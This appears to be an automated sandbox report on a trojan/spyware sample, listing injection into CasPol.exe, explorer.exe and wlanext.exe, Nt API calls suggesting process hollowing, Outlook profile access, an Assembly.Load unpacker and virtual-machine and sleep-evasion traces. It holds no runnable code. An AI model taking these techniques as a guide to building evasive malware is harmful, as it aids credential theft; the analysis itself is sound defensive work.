Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_00401837	1_2_00401837
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0040C03F	1_2_0040C03F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_00405883	1_2_00405883
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_00403903	1_2_00403903
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_004221DD	1_2_004221DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_00401BE0	1_2_00401BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_00421D3F	1_2_00421D3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_00405663	1_2_00405663
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_00422E29	1_2_00422E29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_00420693	1_2_00420693
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_00421F08	1_2_00421F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015DF900	1_2_015DF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015F4120	1_2_015F4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01691002	1_2_01691002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016020A0	1_2_016020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A20A8	1_2_016A20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015EB090	1_2_015EB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A2B28	1_2_016A2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0169DBD2	1_2_0169DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160EBB0	1_2_0160EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A22AE	1_2_016A22AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A1D55	1_2_016A1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A2D07	1_2_016A2D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D0D20	1_2_015D0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A25DD	1_2_016A25DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015ED5E0	1_2_015ED5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01602581	1_2_01602581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E841F	1_2_015E841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A1FF1	1_2_016A1FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015F6E30	1_2_015F6E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A2EF7	1_2_016A2EF7
Source: C:\Windows\explorer.exe	Code function: 2_2_0B71ED52	2_2_0B71ED52
Source: C:\Windows\explorer.exe	Code function: 2_2_0B71FF58	2_2_0B71FF58
Source: C:\Windows\explorer.exe	Code function: 2_2_0B71EFD7	2_2_0B71EFD7
Source: C:\Windows\explorer.exe	Code function: 2_2_0B71CFB2	2_2_0B71CFB2
Source: C:\Windows\explorer.exe	Code function: 2_2_0B71CFAE	2_2_0B71CFAE
Source: C:\Windows\explorer.exe	Code function: 2_2_0B71F397	2_2_0B71F397
Source: C:\Windows\explorer.exe	Code function: 2_2_0B71F387	2_2_0B71F387
Source: C:\Windows\explorer.exe	Code function: 2_2_0B71E272	2_2_0B71E272
Source: C:\Windows\explorer.exe	Code function: 2_2_0B71EE72	2_2_0B71EE72
Source: C:\Windows\explorer.exe	Code function: 2_2_0B719C52	2_2_0B719C52
Source: C:\Windows\explorer.exe	Code function: 2_2_0B720812	2_2_0B720812
Source: C:\Windows\explorer.exe	Code function: 2_2_0B71F212	2_2_0B71F212
Source: C:\Windows\explorer.exe	Code function: 2_2_0B71F207	2_2_0B71F207
Source: C:\Windows\explorer.exe	Code function: 2_2_0B71A290	2_2_0B71A290
Source: C:\Windows\explorer.exe	Code function: 2_2_0B71BC82	2_2_0B71BC82
Source: C:\Windows\explorer.exe	Code function: 2_2_0EF1A290	2_2_0EF1A290
Source: C:\Windows\explorer.exe	Code function: 2_2_0EF1BC82	2_2_0EF1BC82
Source: C:\Windows\explorer.exe	Code function: 2_2_0EF1E272	2_2_0EF1E272
Source: C:\Windows\explorer.exe	Code function: 2_2_0EF1EE72	2_2_0EF1EE72
Source: C:\Windows\explorer.exe	Code function: 2_2_0EF19C52	2_2_0EF19C52
Source: C:\Windows\explorer.exe	Code function: 2_2_0EF20812	2_2_0EF20812
Source: C:\Windows\explorer.exe	Code function: 2_2_0EF1F212	2_2_0EF1F212
Source: C:\Windows\explorer.exe	Code function: 2_2_0EF1F207	2_2_0EF1F207
Source: C:\Windows\explorer.exe	Code function: 2_2_0EF1EFD7	2_2_0EF1EFD7
Source: C:\Windows\explorer.exe	Code function: 2_2_0EF1CFB2	2_2_0EF1CFB2
Source: C:\Windows\explorer.exe	Code function: 2_2_0EF1CFAE	2_2_0EF1CFAE
Source: C:\Windows\explorer.exe	Code function: 2_2_0EF1F397	2_2_0EF1F397
Source: C:\Windows\explorer.exe	Code function: 2_2_0EF1F387	2_2_0EF1F387
Source: C:\Windows\explorer.exe	Code function: 2_2_0EF1ED52	2_2_0EF1ED52
Source: C:\Windows\explorer.exe	Code function: 2_2_0EF1FF58	2_2_0EF1FF58

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: String function: 015DB150 appears 35 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0041E593 NtCreateFile,	1_2_0041E593
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0041E643 NtReadFile,	1_2_0041E643
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0041E6C3 NtClose,	1_2_0041E6C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0041E773 NtAllocateVirtualMemory,	1_2_0041E773
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0041E58E NtCreateFile,	1_2_0041E58E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0041E63D NtReadFile,	1_2_0041E63D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0041E6BE NtClose,	1_2_0041E6BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0041E76D NtAllocateVirtualMemory,	1_2_0041E76D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_01619910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016199A0 NtCreateSection,LdrInitializeThunk,	1_2_016199A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_01619860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619840 NtDelayExecution,LdrInitializeThunk,	1_2_01619840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016198F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_016198F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619A50 NtCreateFile,LdrInitializeThunk,	1_2_01619A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619A20 NtResumeThread,LdrInitializeThunk,	1_2_01619A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_01619A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619540 NtReadFile,LdrInitializeThunk,	1_2_01619540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016195D0 NtClose,LdrInitializeThunk,	1_2_016195D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619710 NtQueryInformationToken,LdrInitializeThunk,	1_2_01619710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619FE0 NtCreateMutant,LdrInitializeThunk,	1_2_01619FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016197A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_016197A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619780 NtMapViewOfSection,LdrInitializeThunk,	1_2_01619780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_01619660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016196E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_016196E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619950 NtQueueApcThread,	1_2_01619950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016199D0 NtCreateProcessEx,	1_2_016199D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0161B040 NtSuspendThread,	1_2_0161B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619820 NtEnumerateKey,	1_2_01619820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016198A0 NtWriteVirtualMemory,	1_2_016198A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619B00 NtSetValueKey,	1_2_01619B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0161A3B0 NtGetContextThread,	1_2_0161A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619A10 NtQuerySection,	1_2_01619A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619A80 NtOpenDirectoryObject,	1_2_01619A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619560 NtWriteFile,	1_2_01619560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619520 NtWaitForSingleObject,	1_2_01619520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0161AD30 NtSetContextThread,	1_2_0161AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016195F0 NtQueryInformationFile,	1_2_016195F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619760 NtOpenProcess,	1_2_01619760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619770 NtSetInformationFile,	1_2_01619770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0161A770 NtOpenThread,	1_2_0161A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619730 NtQueryVirtualMemory,	1_2_01619730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0161A710 NtOpenProcessToken,	1_2_0161A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619670 NtQueryInformationProcess,	1_2_01619670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619650 NtQueryValueKey,	1_2_01619650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01619610 NtEnumerateValueKey,	1_2_01619610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016196D0 NtCreateKey,	1_2_016196D0

Source: file.exe, 00000000.00000002.259559774.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs file.exe
Source: file.exe, 00000000.00000002.259559774.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVECTOR.dll. vs file.exe
Source: file.exe, 00000000.00000002.259559774.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs file.exe
Source: file.exe, 00000000.00000002.263147483.0000000005510000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs file.exe
Source: file.exe, 00000000.00000002.259559774.0000000002FCA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs file.exe
Source: file.exe, 00000000.00000002.259535992.0000000002E30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameVECTOR.dll. vs file.exe
Source: file.exe, 00000000.00000002.259559774.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs file.exe
Source: file.exe, 00000000.00000002.259190786.000000000125A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000000.256274105.0000000000B6A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHHG.exe( vs file.exe
Source: file.exe, 00000000.00000002.259736068.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameHHG.exe( vs file.exe

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Virustotal: Detection: 37%

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\wlanext.exe

File created: C:\Users\user\AppData\Local\Temp\30q5648k6

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/2@9/8

Source: file.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\file.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\wlanext.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: caspol.pdbdv source: explorer.exe, 00000002.00000002.540010102.0000000015063000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 0000000A.00000002.526928605.00000000033E3000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: CasPol.exe, 00000001.00000003.260799452.000000000141C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000003.257818548.000000000127B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 0000000A.00000002.526130221.0000000000F0F000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 0000000A.00000003.309461880.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 0000000A.00000002.526130221.0000000000DF0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 0000000A.00000003.310912796.0000000000C56000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: caspol.pdb source: explorer.exe, 00000002.00000002.540010102.0000000015063000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 0000000A.00000002.526928605.00000000033E3000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\VECTOR.pdb source: file.exe, 00000000.00000002.259559774.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.259535992.0000000002E30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000001.00000003.260799452.000000000141C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000003.257818548.000000000127B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 0000000A.00000002.526130221.0000000000F0F000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 0000000A.00000003.309461880.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 0000000A.00000002.526130221.0000000000DF0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 0000000A.00000003.310912796.0000000000C56000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wlanext.pdb source: CasPol.exe, 00000001.00000002.310591072.00000000018E0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HHG.pdb source: file.exe
Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\VECTOR.pdbBSJB source: file.exe, 00000000.00000002.259559774.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.259535992.0000000002E30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HHG.pdbBSJB source: file.exe
Source:	Binary string: wlanext.pdbGCTL source: CasPol.exe, 00000001.00000002.310591072.00000000018E0000.00000040.10000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: file.exe, A/cb09d240eda4f61d1ad1b9a82f0cb3e84.cs	.Net Code: c6e5efca3752d33c748cfb3eaed6c641d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.file.exe.b20000.0.unpack, A/cb09d240eda4f61d1ad1b9a82f0cb3e84.cs	.Net Code: c6e5efca3752d33c748cfb3eaed6c641d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0041157F push esp; ret	1_2_0041161D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_004115EB push esp; ret	1_2_0041161D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0041B619 push edx; retf	1_2_0041B622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_00401E30 push eax; ret	1_2_00401E32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0162D0D1 push ecx; ret	1_2_0162D0E4
Source: C:\Windows\explorer.exe	Code function: 2_2_0B71ABF5 push ebx; ret	2_2_0B71ABFE
Source: C:\Windows\explorer.exe	Code function: 2_2_0EF1ABF5 push ebx; ret	2_2_0EF1ABFE

Source: initial sample

Static PE information: section name: .text entropy: 7.984487809492925

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 5244	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 3956	Thread sleep time: -48000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 1_2_016A5BA5 rdtsc

1_2_016A5BA5

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 867			Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 880			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

API coverage: 9.2 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: explorer.exe, 00000002.00000003.475780326.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: explorer.exe, 00000002.00000002.525053305.0000000001425000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000002.534510669.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475780326.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW\A%SystemRoot%\system32\mswsock.dllts\AppTiles\StoreBadgeLogo.pngU
Source: file.exe, 00000000.00000002.259559774.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %HoQxAtdqlIT8fXjyyNqUj+ePCqeMUFBXRIvivNBcy
Source: explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.478169748.000000000F583000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000002.00000000.269730319.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000002.00000003.475780326.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000002.534510669.0000000009056000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000002.00000003.475780326.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000002.00000000.266045903.0000000005063000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: file.exe, 00000000.00000002.259559774.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %HoQxAtdqlIT8fXjyyNqUj+ePCqeMUF
Source: explorer.exe, 00000002.00000002.534510669.0000000009056000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
